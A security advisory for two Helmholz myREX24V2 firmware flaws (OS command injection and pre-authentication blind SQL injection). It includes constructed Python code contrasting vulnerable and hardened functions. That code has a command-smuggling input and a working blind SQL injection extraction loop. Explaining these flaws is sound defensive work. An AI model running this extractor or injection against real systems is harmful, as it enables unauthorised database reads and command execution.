Summary
Two vulnerabilities have been discovered in Helmholz myREX24V2 / myREX24V2.virtual that allow an unauthenticated remote attacker to execute arbitrary OS commands (RCE) or to inject SQL (SQLi).
Impact
CVE-2026-32968 allows unauthenticated RCE resulting in full system compromise impacting confidentiality, integrity, and availability, while CVE-2026-32969 allows unauthenticated SQLi resulting in arbitrary read access to the complete database.
Affected Product(s)
| Product name | Affected versions |
|---|---|
| Helmholz myREX24V2 | Firmware <=2.19.3 |
| myREX24V2.virtual | Firmware <=2.19.3 |
Vulnerabilities
CVE-2026-32968: Due to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant of CVE-2020-10383.
CVE-2026-32969: An unauthenticated remote attacker can exploit a pre-authentication blind SQL injection vulnerability in the authentication method of the userinfo endpoint, due to improper neutralisation of special elements in a SQL SELECT command. This can result in a total loss of confidentiality (arbitrary read access to the complete database).
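The two entries above name weakness classes (CWE-78 OS command injection and CWE-89 SQL injection) without showing code, so the following is an added, constructed illustration of each: the injectable form beside its hardened form, plus a boolean-based blind extractor that shows why a "login ok / login failed" answer alone is enough to read the whole database. It is not code from Helmholz, the myREX24V2 firmware, or the reporters; the function names, the `users` table and the credentials in it are hypothetical, and `echo` stands in for whatever command the real module runs.

```python
"""Constructed illustration of the two weakness classes named in the entries
above: CWE-78 (OS command injection) and CWE-89 (blind SQL injection).
Added example code, not code from Helmholz or the myREX24V2 firmware; every
function, table and credential here is hypothetical."""
import sqlite3
import subprocess

HOST_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-")


# --- CWE-78: special elements in an OS command -----------------------------

def run_echo_vulnerable(host: str) -> str:
    # Command line built by string concatenation and handed to /bin/sh, so
    # shell metacharacters in `host` (; | $() `...`) start further commands.
    return subprocess.run(f"echo {host}", shell=True, capture_output=True,
                          text=True).stdout


def run_echo_hardened(host: str) -> str:
    # Two independent layers: an allow-list on the untrusted value, and an
    # argument vector with shell=False so no shell ever parses the input.
    if not host or host.startswith("-") or not set(host) <= HOST_CHARS:
        raise ValueError(f"rejected host value: {host!r}")
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


# --- CWE-89: special elements in a SQL SELECT used for authentication ------

def make_demo_db() -> sqlite3.Connection:
    # In-memory stand-in for the application database (constructed data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("admin", "S3cret!", "admin"), ("guest", "guest", "user")])
    return con


def userinfo_vulnerable(con: sqlite3.Connection, name: str, password: str) -> bool:
    # Credentials interpolated into the SELECT: a quote in `name` ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return con.execute(sql).fetchone() is not None


def userinfo_hardened(con: sqlite3.Connection, name: str, password: str) -> bool:
    # Bound parameters: values travel separately from the statement text, so
    # input can never change the structure of the query.
    sql = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone() is not None


def blind_extract_password(con, victim: str, auth=userinfo_vulnerable,
                           max_len: int = 32) -> str:
    # Boolean-based blind extraction. The endpoint only answers "login ok" or
    # "login failed", but that single bit answers one character comparison per
    # request, which is enough to read any column of any table. Against the
    # parameterised auth function the oracle never fires and this returns "".
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):          # printable ASCII
            probe = (f"' OR (SELECT unicode(substr(password, {pos}, 1)) "
                     f"FROM users WHERE name = '{victim}') = {code} -- ")
            if auth(con, probe, "x"):
                hit = chr(code)
                break
        if hit is None:                      # substr() past the end is NULL
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_demo_db()
    print(run_echo_vulnerable("x; echo INJECTED"), end="")
    print(blind_extract_password(db, "admin"))
    print(repr(blind_extract_password(db, "admin", auth=userinfo_hardened)))
```

The blind extractor is deliberately written against the authentication function rather than the database, because that is the only interface a pre-authentication attacker has; the same loop works over HTTP against any endpoint whose response differs between a matched and an unmatched credential.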
Remediation
Update the myREX24V2/myREX24V2.virtual instance to version 2.19.4.
Acknowledgments
Helmholz GmbH & Co. KG thanks the following parties for their efforts:
- CERT@VDE for coordination (see https://certvde.com)
- Moritz Abrell and Christian Zäske from SySS GmbH for reporting (see https://www.syss.de)
Revision History
| Version | Date | Summary |
|---|---|---|
| 1.0.0 | 23.03.2026 13:00 | Initial revision. |